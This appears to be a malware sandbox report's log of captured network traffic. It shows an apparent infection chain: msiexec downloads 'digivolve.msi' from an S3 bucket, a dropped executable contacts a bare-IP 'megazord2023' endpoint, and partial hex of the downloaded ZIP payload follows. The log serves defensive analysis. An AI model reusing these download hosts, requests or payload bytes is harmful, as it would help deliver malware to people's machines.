Jan 5, 2023 13:18:30.735028028 CET	2100	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 184 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 5, 2023 13:18:30.883714914 CET	2101	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 12:18:30 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 5, 2023 13:18:30.885226965 CET	2101	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 184 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 5, 2023 13:18:31.032007933 CET	2102	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 12:18:30 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 5, 2023 13:18:31.040606022 CET	2102	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 172 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 5, 2023 13:18:31.206187963 CET	2103	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 12:18:31 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 5, 2023 13:18:31.207782030 CET	2103	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 179 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 5, 2023 13:18:31.354715109 CET	2104	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 12:18:31 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 5, 2023 13:18:31.358182907 CET	2104	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 219 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 5, 2023 13:18:31.504965067 CET	2105	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 12:18:31 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 5, 2023 13:18:31.506567001 CET	2105	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 176 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 5, 2023 13:18:31.659573078 CET	2106	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 12:18:31 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49699	20.203.138.85	80	C:\Users\user\LtfQdc.exe

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2023 13:18:37.865401030 CET	2106	OUT	GET /megazord2023/index.php HTTP/1.1 User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36" Host: 20.203.138.85 Connection: Keep-Alive
Jan 5, 2023 13:18:37.920202971 CET	2107	IN	HTTP/1.1 302 Found Date: Thu, 05 Jan 2023 12:18:37 GMT Server: Apache/2.4.29 (Ubuntu) Location: https://amxx1515cabreun23.asxo/ Content-Length: 92 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 73 74 72 6f 6e 67 3e 42 72 6f 77 73 65 72 3a 20 3c 2f 73 74 72 6f 6e 67 3e 43 68 72 6f 6d 65 3c 62 72 20 2f 3e 3c 73 74 72 6f 6e 67 3e 4f 70 65 72 61 74 69 6e 67 20 53 79 73 74 65 6d 3a 20 3c 2f 73 74 72 6f 6e 67 3e 55 6e 6b 6e 6f 77 6e 20 4f 53 20 50 6c 61 74 66 6f 72 6d Data Ascii: <strong>Browser: </strong>Chrome<br /><strong>Operating System: </strong>Unknown OS Platform
Jan 5, 2023 13:18:38.140886068 CET	2107	IN	HTTP/1.1 302 Found Date: Thu, 05 Jan 2023 12:18:37 GMT Server: Apache/2.4.29 (Ubuntu) Location: https://amxx1515cabreun23.asxo/ Content-Length: 92 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 73 74 72 6f 6e 67 3e 42 72 6f 77 73 65 72 3a 20 3c 2f 73 74 72 6f 6e 67 3e 43 68 72 6f 6d 65 3c 62 72 20 2f 3e 3c 73 74 72 6f 6e 67 3e 4f 70 65 72 61 74 69 6e 67 20 53 79 73 74 65 6d 3a 20 3c 2f 73 74 72 6f 6e 67 3e 55 6e 6b 6e 6f 77 6e 20 4f 53 20 50 6c 61 74 66 6f 72 6d Data Ascii: <strong>Browser: </strong>Chrome<br /><strong>Operating System: </strong>Unknown OS Platform

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49691	52.217.160.129	443	C:\Windows\SysWOW64\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-05 12:18:09 UTC	0	OUT	GET /digivolve.msi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: mzrdmodlonnce.s3.amazonaws.com
2023-01-05 12:18:09 UTC	0	IN	HTTP/1.1 200 OK x-amz-id-2: giJlR+jwoK6yqUkHBDFlPKj6u8ifYBpHBfYN8EKaotZ1+pLQQJcQXiJID6b9+OtUGpkQDXFEwXM= x-amz-request-id: P1CNSM7PK4KGH8Y8 Date: Thu, 05 Jan 2023 12:18:10 GMT Last-Modified: Tue, 03 Jan 2023 03:07:25 GMT ETag: "adc4a5ca2eed9759869cf26e5000f694" Accept-Ranges: bytes Content-Type: binary/octet-stream Server: AmazonS3 Content-Length: 1907700 Connection: close
2023-01-05 12:18:09 UTC	0	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 71 1f 63 55 dc 16 3c 0e 09 3d 06 00 a8 c5 0c 00 0a 00 00 00 64 69 67 69 6d 6e 2e 62 7a 32 ec 5a 7b 7c 13 55 be 3f 49 d3 92 3e cf 84 57 d1 45 88 38 ae 2d 02 16 dd e5 22 b2 dc 80 2d 0a 16 88 14 8c f2 6c 81 16 58 4a d3 5b 6a 65 5d a0 a5 69 c1 58 e3 d6 15 bd 28 97 5d 7c ad 8a 77 3f a2 22 0b eb 2b 69 95 47 0b 58 84 02 95 d2 07 0f 99 29 42 5a 40 68 79 e5 fe 7e e7 cc 24 69 d2 42 b9 eb de 7f ee ce a7 33 73 e6 3c 7e e7 f7 fc 9e df 39 cd 84 69 4b 89 86 10 a2 23 ed 2f 13 b9 f9 b5 14 ee 98 fe 7f 8f 21 9b c3 f7 dc b9 55 93 bc e7 ce 29 0b 16 2e 31 66 e7 58 e7 e7 a4 2d 36 ce 4d cb ca b2 e6 1a e7 a4 1b 73 9e ce 32 2e cc 32 26 4e 4a 31 2e b6 ce 4b 1f 22 12 62 4e 22 24 59 13 4e 4e 1c 9f 33 57 a5 d7 40 06 68 22 35 31 84 24 46 10 32 59 cb eb 5a Data Ascii: PKqcU<=digimn.bz2Z{\|U?I>WE8-"-lXJ[je]iX(]\|w?"+iGX)BZ@hy~$iB3s<~9iK#/!U).1fX-6Ms2.2&NJ1.K"bN"$YNN3W@h"51$F2YZ
2023-01-05 12:18:09 UTC	4	IN	Data Raw: 4b 6f e9 8a 8e a1 51 fe 77 68 58 37 9d ff 8d 7b 65 ff fb 17 01 f7 e8 a4 14 63 86 35 c7 38 2e 2b 37 3d d3 08 5f 83 27 8e 1b 64 7c 78 f2 53 e6 29 93 1e 19 3d 21 c5 38 e7 77 c6 91 69 d9 d9 39 56 93 35 3b 3d 6b c9 92 cc 21 d6 9c f9 a3 c8 6e e5 2a d0 e8 a3 69 58 68 8c 36 2a 32 22 3c a4 9b ae a0 5b 24 0d 8b d0 69 c2 f5 a1 da a8 98 e8 10 1a 70 91 ec 81 d3 d6 4a 1f 97 e9 97 0e 98 5c da f0 f7 0a 32 61 d9 d0 e5 09 9a e4 95 bb af 6d ba fa 51 c1 1e 32 ca 5c f9 87 c6 75 1f 25 fe 34 b0 67 d6 b3 f5 ef 90 bb 8e 5d ee 75 a0 cf 30 77 cd 90 68 d7 ee 4b 0f 11 f1 3f 22 b7 bf fc ec b1 3d f7 ad fd 7c aa fc b7 59 24 be 31 c2 f4 dc e9 85 e3 ef 2a fc 60 e7 dc 37 ca c8 8e 2f ac b1 8b bf ab 5a fa 9e f6 9b 67 bf da d8 8b fc f6 b3 d9 ef e4 9e f8 f6 f2 af ef 1d bd af b4 df 8b 1a 6d 08 Data Ascii: KoQwhX7{ec58.+7=_'d\|xS)=!8wi9V5;=k!niXh62"<[$ipJ\2amQ2\u%4g]u0whK?"=\|Y$1*`7/Zgm
2023-01-05 12:18:09 UTC	20	IN	Data Raw: ac 0d ba dd c4 cd 9d c4 20 07 e5 6e 7e 45 78 c9 ff 2b 02 6b 84 76 45 7f 73 35 3f b8 91 b9 bb 1f 63 98 eb ba a5 f4 cd 65 f4 20 07 e5 c7 5a d9 98 e8 2a 56 7e 67 ec d7 af 8b 7d fc b0 38 a5 4c 78 b9 f2 a4 d7 2b 2f 4d d1 fd a0 a8 49 2f 49 1f 56 d8 23 7c 9d 36 57 93 df 02 d9 2d 74 76 25 bf 05 b2 5b e8 ec 4a 7e 0b 64 b7 d0 d9 13 e4 c5 89 f2 9c 64 79 5e 8a de 9e 26 2f 4e 97 e7 cc 97 e7 2d d4 db 97 c8 8b 97 cb 73 9e 92 e7 3d ab b7 af 92 17 af 91 e7 bc 20 cf 5b af b5 6f 2a c3 86 c3 d1 9c 2c ed a2 49 54 f2 08 8d 3e 37 23 7b e6 e5 0b 7f a0 ed 23 5a 94 d3 ad 93 a4 fd 85 4d 23 a4 da c2 33 23 a4 bd 85 a7 46 49 95 85 a7 47 c5 5e 28 6c 1a 1e db 5e 78 66 78 6c 79 e1 29 63 6c 75 e1 69 23 6c 46 d8 8c b0 0d 87 6d 78 6c 2b 7d ba c6 46 ca 99 8c 70 25 f2 7a eb b4 90 44 6b c2 18 Data Ascii: n~Ex+kvEs5?ce ZV~g}8Lx+/MI/IV#\|6W-tv%[J~ddy^&/N-s= [o,IT>7#{#ZM#3#FIG^(l^xfxly)clui#lFmxl+}Fp%zDk
2023-01-05 12:18:09 UTC	21	IN	Data Raw: c3 e9 8f 22 a4 da 7f 9e 7d ad 01 11 cd b6 27 bf 75 0c 01 c5 96 2d d8 e3 44 44 af bd bf 99 7e 02 11 b5 ec 27 96 ad 45 44 ab 6d f9 3b 6b 10 51 ea ea ce 96 2c 44 74 5a 72 ff b8 87 11 51 69 f5 87 ad ef 21 a0 51 f3 94 e5 b7 23 9e 50 f4 8f 97 8d 47 40 9f a6 2f 5f fe 16 01 75 c6 be 58 ba 13 41 6d 26 ce 5d 7d 02 81 65 b6 3e 3e e1 cc fe 87 ee fd 3a ac a8 e0 ae b2 fc 57 aa 7e 7c b6 71 5f 4d ce 91 33 2f 54 ad 3c 97 3b 27 e7 d2 17 e2 b8 d5 ff f5 64 6b e8 fb 6f 96 ff de 99 b3 2c fc a3 91 9e dd c6 37 7f 32 fa 8e 47 22 c7 3c 78 cb f3 77 6c ce 31 8e bf b4 f6 68 f4 6f ad 65 09 2f 7d f8 f5 03 bb 76 ef 19 1b be fb 9d 69 29 23 cd 5b 4b 9e bc f3 e1 4f 67 3c b4 77 b7 cb 99 12 b3 61 c5 d5 ad f7 e5 fe bc b9 a3 26 fe 43 71 ef e2 71 f3 1f 99 f5 ea 6d 89 cf aa 79 b6 d4 bc 5b 73 93 Data Ascii: "}'u-DD~'EDm;kQ,DtZrQi!Q#PG@/_uXAm&]}e>>:W~\|q_M3/T<;'dko,72G"<xwl1hoe/}vi)#[KOg<wa&Cqqmy[s
2023-01-05 12:18:09 UTC	37	IN	Data Raw: ea 13 ee c1 f8 99 6b a4 4b 48 85 36 bd 90 a7 95 fe 06 16 8a c7 46 13 0e 0a 15 7a 51 f7 4f 8d 3f 57 81 97 e6 2a 38 4d ac ed a2 b5 5d 19 c1 15 d7 90 5d 83 12 0b 0c 57 b5 4c 21 26 90 3e d2 3b 28 0c 0c 41 2f c0 89 85 ed 74 d7 b0 8d 6a 6f 3a d6 43 83 7d d2 18 ff 1e c5 1f 38 03 7b bd 1a 74 ea 0e 3f 68 b7 94 13 6c f3 a8 60 9b 4b 03 ab 54 76 9c 37 4a 74 49 8d 24 d7 27 58 40 4b 17 53 c7 4f 5f cd ad 9e 84 87 7c 7d f1 92 b2 e5 69 b5 4e b0 fa d8 85 7a 7f 68 1c 68 32 bd 05 76 c9 80 b6 de bf fc 58 8b 47 1b b9 84 46 e1 fa 63 5d 0b 7d 66 19 84 de 48 f3 fe a8 75 07 b4 53 67 1c 98 6d 39 e4 bc 20 c6 ff 6d 10 6c 61 26 de f6 ea 8b 2a 36 8e 92 23 43 61 e3 48 00 6b a4 e2 f8 55 22 8e 38 db 00 77 c3 d1 f6 b7 ea 6b eb 41 e4 39 ae 35 77 09 b9 6d b2 a3 5b 2b a7 76 93 46 e9 df 98 2c Data Ascii: kKH6FzQO?W8M]]WL!&>;(A/tjo:C}8{t?hl`KTv7JtI$'X@KSO_\|}iNzhh2vXGFc]}fHuSgm9 mla&6#CaHkU"8wkA95wm[+vF,
2023-01-05 12:18:09 UTC	38	IN	Data Raw: eb 3c ed 72 c7 54 55 f8 98 35 ef 09 30 82 bf da 37 b1 23 0a c5 90 1b c6 4c a8 68 11 4a 4e 7b 27 ab 03 ee d5 9b 77 7a 47 43 bf 82 04 80 03 7c 8c 26 94 68 a7 7d e2 d0 a0 2f f4 81 f5 96 c3 95 91 35 ba ba 85 23 9b d2 f9 90 74 c8 01 3a c6 19 d0 c3 f4 fc eb 5e 06 fd dd 39 5c 80 69 d2 8d 28 dc fd d9 6d 11 40 c8 88 f7 64 50 af 8a b2 53 e4 b3 87 94 fd 40 79 7a 29 96 06 e2 95 96 74 cc da a8 c4 83 62 34 ea 28 b2 57 aa 02 15 4b be 43 72 29 a0 a1 73 4d 06 aa e0 35 87 95 e5 9b 7b 0c 96 3c bd 23 56 b0 73 53 ed 3a 92 7f 49 ac d4 0b b6 78 a8 e6 7a a1 d4 30 bd d4 b8 d2 ea b1 29 fe 9c 28 d0 5e 6c 09 e7 f8 51 99 5a 57 a3 8e 94 1a bc 73 55 90 db 04 9b 96 26 0f cf 55 2a 23 51 30 53 29 d9 fe 54 c8 49 a2 2d 9e f4 da a5 29 18 11 00 f7 a3 31 4a 02 ee b7 45 d3 7b cb 64 c7 2d 98 05 Data Ascii: <rTU507#LhJN{'wzGC\|&h}/5#t:^9\i(m@dPS@yz)tb4(WKCr)sM5{<#VsS:Ixz0)(^lQZWsU&U*#Q0S)TI-)1JE{d-
2023-01-05 12:18:09 UTC	54	IN	Data Raw: 41 fa c9 e2 93 58 8e 22 11 b3 9e b9 0a 89 78 c5 6e 7c 65 89 c8 a9 12 31 31 58 f8 80 a2 15 89 98 e8 97 88 dc 65 25 e2 3b 7f 8b 90 63 6f fc 4d 95 88 e9 43 49 c4 14 f1 af ef 50 89 98 16 26 11 97 46 96 74 df df 06 c6 2b 7f 33 f2 d0 3e a8 3c bc 83 ca c3 54 2a 0f d3 ae 5e 1e 46 f3 43 ee eb 19 7f 57 f8 be 9e 9f 47 87 ed eb 49 26 b3 86 10 87 9a be a0 38 4c 44 71 98 e5 17 87 31 54 1c 5e ff 95 c4 21 37 98 38 d4 a1 a4 e2 68 74 da 00 71 a8 43 71 68 8a 10 87 5c 40 1c d6 0f 2e 0e b9 81 e2 90 f3 57 a2 7e 1e 22 0e b9 34 9b 89 af 71 52 71 98 8c 48 51 76 24 ad 19 a6 ee 48 12 46 b2 cd 61 7b 92 26 28 38 2c 06 00 12 4d 9f 00 e1 4b 39 08 3f 02 b7 24 45 47 ee 48 fa 79 da 95 76 24 ad 45 88 52 5d e8 a6 a4 1e ad 32 44 8a 2c d4 0b d1 28 0a 93 c9 48 90 63 a9 28 c7 22 25 e1 6d 65 24 Data Ascii: AX"xn\|e11Xe%;coMCIP&Ft+3><T*^FCWGI&8LDq1T^!78htqCqh\@.W~"4qRqHQv$HFa{&(8,MK9?$EGHyv$ER]2D,(Hc("%me$
2023-01-05 12:18:09 UTC	55	IN	Data Raw: 5f 79 ff 1e 38 5f 02 9b 45 4f 9f 32 ef bf 97 14 a3 c6 bc 78 7a 66 e4 e1 53 78 d0 d4 b8 22 e9 d4 06 59 0e 1e 34 45 f7 fb 1d df c5 e0 41 53 25 18 c5 3c e0 5c 29 f5 68 1d 72 b6 a0 bc 3e 30 53 1c 16 73 8f 2b 09 7b 5f c3 6f ad ed 78 1c 6a 8c b0 8c f3 7f 7c 36 fc e3 5e f9 10 cc 82 75 ac 0a a6 bb 1c 98 31 00 a6 1f 12 cc c9 01 a4 f3 78 30 97 ac d3 48 4f fc 1a e4 4c ac 90 23 be 38 ff 51 17 1b d5 13 54 c3 8b 18 45 8b 08 fd 56 39 db 8e 62 d9 2e 58 53 90 f6 72 4d 40 7e 1b 4a 70 9b d2 5d 25 f1 ce a9 55 77 33 7c cd 07 d8 aa c6 a6 18 98 2d c8 3e 31 87 25 c3 49 6f 13 73 2b 0d 86 be 4e 2a ec eb 97 89 db 1b 7f 57 49 82 b3 92 12 e9 2c b2 4f ba 1b 9f f6 42 31 de 69 c2 3d 5a 73 7d ed 4e d5 ab 3a 12 09 20 b1 ba 0f a9 90 7f 76 1e 3e 1a 43 ba c5 e5 5a 72 27 19 d5 71 37 4b 29 17 Data Ascii: _y8_EO2xzfSx"Y4EAS%<\)hr>0Ss+{_oxj\|6^u1x0HOL#8QTEV9b.XSrM@~Jp]%Uw3\|->1%Ios+N*WI,OB1i=Zs}N: v>CZr'q7K)
2023-01-05 12:18:09 UTC	71	IN	Data Raw: 51 55 57 e3 30 7c 26 39 49 26 64 e0 0c 30 40 c0 28 51 a2 92 8a 9a 28 22 63 02 24 24 93 44 20 30 21 24 41 25 88 0a 31 46 6d 31 cc 90 a0 04 12 26 d1 6c 0e 63 b1 95 96 b6 da 6a 45 1f db a7 17 ea 85 8b 22 ce 10 9b 09 97 42 b8 14 03 a4 10 34 c5 1d 27 d5 70 29 24 01 72 be b5 f6 3e 67 2e b9 00 ed fb fe bf df f7 bd bf d7 96 cc d9 fb ac b5 cf 5e 6b af bd f6 5a fb b2 76 93 0e af bd 8e bd 5b bd f6 3a 4e 9e 0d fc f1 a4 1a b1 24 bc f7 3a 86 dd 7b cd e6 86 49 46 34 2d fb 13 3b 8d 87 d6 71 51 8c 9c a1 67 97 5f b3 a0 21 ab e2 ac d4 fc b4 ca 69 a9 ba 00 e3 91 64 a4 7b 8d 78 89 3c ab 2b a4 12 5d a8 7a 4c ce fc 58 4f 08 1b 1a 32 e6 61 b9 ab e6 93 55 d1 9e 97 9b d4 25 b0 b9 54 fe b6 47 e1 69 1d df a6 c5 37 54 ad f9 01 7c 07 67 1d e2 9c 86 e1 64 36 ee f3 02 0f 00 3b 98 8a cd Data Ascii: QUW0\|&9I&d0@(Q("c$$D 0!$A%1Fm1&lcjE"B4'p)$r>g.^kZv[:N$:{IF4-;qQg_!id{x<+]zLXO2aU%TGi7T\|gd6;
2023-01-05 12:18:09 UTC	72	IN	Data Raw: cd b2 c9 e1 ec d4 39 56 4b c0 dd b2 bd e3 2e c5 96 c4 62 7b 4c 54 6f d5 04 9c 5a 5d db 50 9c 5a 4a 15 a5 4f be 8a 94 1c 62 08 ee c7 02 3e 49 d5 b8 18 2e 4f 5a 9b 13 45 f6 e2 0d 36 b8 ba 45 57 c1 97 d6 e6 46 c9 51 e4 54 db bf 74 0c 0f 87 d1 fd f8 a8 56 c7 48 1f c1 ea 64 27 fb b7 5b ae 15 7c d7 78 b6 bd c5 1c c6 14 10 24 39 a2 ff 2a 26 28 5f 92 b3 35 bb a1 7d 57 8d 4c 95 47 3a 4b 75 78 b1 df 83 90 ae 0d 79 d8 d1 a5 2b f3 fa ae 5a 9d 50 ab 07 6a 80 77 36 09 45 ac fc 01 d2 45 4f e4 f6 60 b8 a3 c2 58 e8 27 f3 7d e5 1f 0b 2c ff b0 bf 3a 14 75 58 a6 88 e3 63 76 13 f4 ee 9b 59 39 38 ef fa 53 28 07 13 a4 13 48 88 90 76 a2 3b e3 b1 e0 11 05 21 f1 62 92 bd 49 aa f9 31 e2 e6 19 f1 36 31 1d 19 b4 36 3b 01 6a 93 7d 24 95 21 65 1f c1 2e 45 67 e7 22 2b 8e 78 43 f1 1b 17 Data Ascii: 9VK.b{LToZ]PZJOb>I.OZE6EWFQTtVHd'[\|x$9*&(_5}WLG:Kuxy+ZPjw6EEO`X'},:uXcvY98S(Hv;!bI1616;j}$!e.Eg"+xC
2023-01-05 12:18:09 UTC	88	IN	Data Raw: a0 1b fb 36 2b 60 12 4a d6 7d bc 00 18 8f 45 ee c9 fe ab 56 35 33 9a c9 64 39 bb a9 6a 37 1b 14 b2 f4 a1 85 26 dd 79 32 5f 2c f2 88 8f 0b 37 e6 cb ce d3 05 eb ff d1 03 78 44 bd e0 f6 8e 1e c0 97 ed 05 f7 ce 68 cd 9d 70 64 07 f8 b2 ae b7 fc 9e d3 47 01 cf ef bf d5 57 df c5 0e 24 0f 4b 9f bc a6 3b 3b 45 93 87 b3 2b 42 b0 ef b4 fc 67 22 f1 ce 31 2e 12 75 e4 4b ee d0 8e c3 69 8d 63 d0 3e 62 2e 4e 6a bc 8a ed 23 0e b3 e6 e4 b2 6d f6 dc af 25 15 47 e4 8a 68 d9 62 24 e8 8c ec b2 25 c5 37 ca 79 2d 4e d3 0c c8 75 9a 5e 04 e9 92 2b 62 9c a6 99 d0 68 90 34 1f 2c 1d 0c 52 e1 9c 38 dd bc 5f b6 37 97 15 e9 5c d6 9c b9 34 6d 6b af e6 ee 79 99 5b a7 b7 c8 96 23 dc 8a cc d0 f7 de d4 da af bb db ab 31 46 46 df 58 e3 7e 37 4a 6b b4 fd 33 fd 63 bf e1 37 fe 76 12 7e 23 0a d7 Data Ascii: 6+`J}EV53d9j7&y2_,7xDhpdGW$K;;E+Bg"1.uKic>b.Nj#m%Ghb$%7y-Nu^+bh4,R8_7\4mky[#1FFX~7Jk3c7v~#
2023-01-05 12:18:09 UTC	89	IN	Data Raw: d3 32 ff 67 fd f8 9c 87 3f 67 3e 27 2a 0c a6 35 40 ae 7d 3e e7 d3 7f 53 ae eb 73 3e 15 e4 73 e2 9d 6b 45 44 5c 55 e4 49 5f 15 22 f4 f2 3b ad aa e3 c9 e7 b0 7d 2a 2b e7 f3 6b ab 2c b0 4e c7 c6 bb d1 dd 3b 9b 78 68 2e fc bf a0 40 b1 77 58 69 1b 34 b2 df a4 c5 bb 13 01 c6 69 58 91 78 08 6a 90 33 dd 7c d8 7e 29 50 49 fd 72 5f 7f 03 79 80 17 e8 e7 0b 76 8e 4f 77 f6 e9 1c 89 ae ac 9a dd b6 db 41 3f 4b 5b f3 f4 ce 97 74 e0 7b 66 74 e9 14 dc 00 e8 9c d3 53 64 9e 37 b5 87 1c b0 77 1c ec 22 0d 5a 8f f0 d9 4f cc bf 95 aa 59 3c df fd dc c1 1d 01 9f 99 b7 93 cd 2a 93 73 b5 d9 68 e9 0c f2 86 d7 82 6d 92 21 ca 23 89 bd 9d b8 c1 da ab d0 c7 77 31 27 77 ad a5 63 f9 ad f1 c7 9c e2 8b 18 f5 d9 34 5f b7 1b d5 f1 b8 3f a0 b9 dd c1 0c bf f6 b5 29 51 f1 27 ab 5d e4 52 b9 24 67 Data Ascii: 2g?g>'5@}>Ss>skED\UI_";}+k,N;xh.@wXi4iXxj3\|~)PIr_yvOwA?K[t{ftSd7w"ZOY<*shm!#w1'wc4_?)Q']R$g
2023-01-05 12:18:09 UTC	105	IN	Data Raw: fb 64 f5 a1 52 7d bd af ad 8a bd 8e e6 d1 6e 65 f5 a1 5a 7d dd d8 f6 24 7b 1d cb 72 8f c8 ea 43 ad fa fa 48 5b 1a 7b 3d 9e e5 36 c9 ea c3 3a f5 75 53 5b 1c 7b 9d c0 72 9b 65 f5 61 bd fa ba 99 47 44 dc c8 c2 3e 14 b6 c8 ea c3 eb ea eb 96 b6 33 57 f0 75 0a cb 6d 95 d5 87 8d ea eb d6 36 0f 7b 9d c5 72 a9 ac 3e bc a1 be a6 6d ef b3 d7 56 96 db 2e ab 0f 6f a9 af db db 08 7b 3d 9f e5 76 c8 ea c3 26 f5 75 47 5b 09 bc 96 37 2e 82 dc b0 45 ec d5 fb f8 2a 82 d4 b7 59 e1 8d e3 33 ec c8 60 8b fc 11 fd 87 8f b1 ab 3a 3e 5b c4 b3 7e 89 e0 3d 8e cf f4 3c 29 33 08 13 83 88 e1 59 e5 2c 2b 96 65 45 f3 ac 25 2c 2b 8e 65 4d e0 59 73 59 56 02 cb 1a cf b3 a6 b1 ac 89 2c 2b 99 67 4d 60 59 29 2c 6b 32 cf 1a cd b2 d2 59 d6 2c 9e 15 ce b2 ac 2c 2b 8b 67 9d 67 5e ee 3c 96 b5 80 67 Data Ascii: dR}neZ}${rCH[{=6:uS[{reaGD>3Wum6{r>mV.o{=v&uG[7.E*Y3`:>[~=<)3Y,+eE%,+eMYsYV,+gM`Y),k2Y,,+gg^<g
2023-01-05 12:18:10 UTC	106	IN	Data Raw: 05 61 8d ec 17 29 5c 98 6a f4 57 d9 d2 41 6f 66 75 6e c2 3a 37 61 15 c9 1e ad ce 48 01 d4 fb d6 c6 c8 06 47 45 47 68 e9 7c 68 8f 83 df 56 7d 85 a2 04 56 62 fc 41 b2 a7 ea 2b 26 4b 6d 21 5c a8 74 90 e5 fe 56 d4 41 3e 13 a6 3d 28 4c 80 a5 ca d3 28 dc 51 77 73 96 f4 59 83 e3 ec d8 8b c7 18 17 0e b7 78 a3 90 96 df 7a ae 2a 28 4e d9 ed 40 49 46 87 f9 e8 b2 21 64 62 1c fd 31 b2 a2 5d 44 1a 73 44 10 c7 9a 73 24 af c3 1e 36 ce 4e bd 26 d0 1f e6 a3 a5 83 49 07 39 08 02 73 96 1c 45 a8 a1 b2 f8 01 34 5f b8 6c 24 c3 bd 0f e2 e1 bc 50 f0 f2 c9 23 7a 22 7e 20 87 c2 9b db f1 be 59 7b 87 33 5f a9 39 6a 17 6f 6d f4 0e 36 77 94 46 42 01 17 41 e0 d8 11 c9 50 1d 89 56 52 0d 9b 75 64 6c 6d a6 18 18 ad 3b a8 3f ea d9 99 19 54 37 9b 58 14 36 f8 93 22 39 1e f4 1f d9 b3 d2 7f f4 Data Ascii: a)\jWAofun:7aHGEGh\|hV}VbA+&Km!\tVA>=(L(QwsYxz*(N@IF!db1]DsDs$6N&I9sE4_l$P#z"~ Y{3_9jom6wFBAPVRudlm;?T7X6"9
2023-01-05 12:18:10 UTC	122	IN	Data Raw: 86 c3 13 4f ca 8d 8e ac 78 8a c6 42 02 fa 5f c0 2f c8 70 4b 4c d0 40 9a 01 ea cf 4a 22 9d 34 99 1b df 1b 60 0e dc 3f 0d 37 be 0f 63 3d 61 eb 71 71 a8 85 25 d3 f0 1c 8c 44 6b 58 c7 a6 f8 18 79 4b 3e 5c bb 32 80 d6 be 45 8a 76 79 6f 0c 59 af 62 3f 59 67 54 2c bb e5 9d 69 92 b2 28 1e 36 96 8b e2 c9 45 e6 2b 91 18 89 db e1 98 6a 8b 07 fd 73 1f c3 bb 9d d9 92 39 23 5e de 52 ca 5e 15 8a 8e ba 91 8e 33 dd e6 3a fb 68 79 e7 d2 88 d4 c3 6b 1c 3d 78 96 85 d9 4b a0 6c 84 bc b3 56 6c 82 37 92 b9 51 de 36 0f fb 93 5f ab dc 63 c4 ac 03 a3 98 3b ea 91 cf c9 25 72 2a 6c 2d 90 fc dd 72 cd 02 20 ff 7f 5a 37 3d 8f fe f9 67 9c 09 ce e0 93 7e 73 49 74 1e 35 3f a3 81 d4 3e a9 bd 37 42 10 c2 cf 73 5a 82 cb c0 51 1f 1d d6 54 78 43 eb 66 e4 d1 25 e1 d5 df 92 47 e7 3c 19 f6 24 21 Data Ascii: 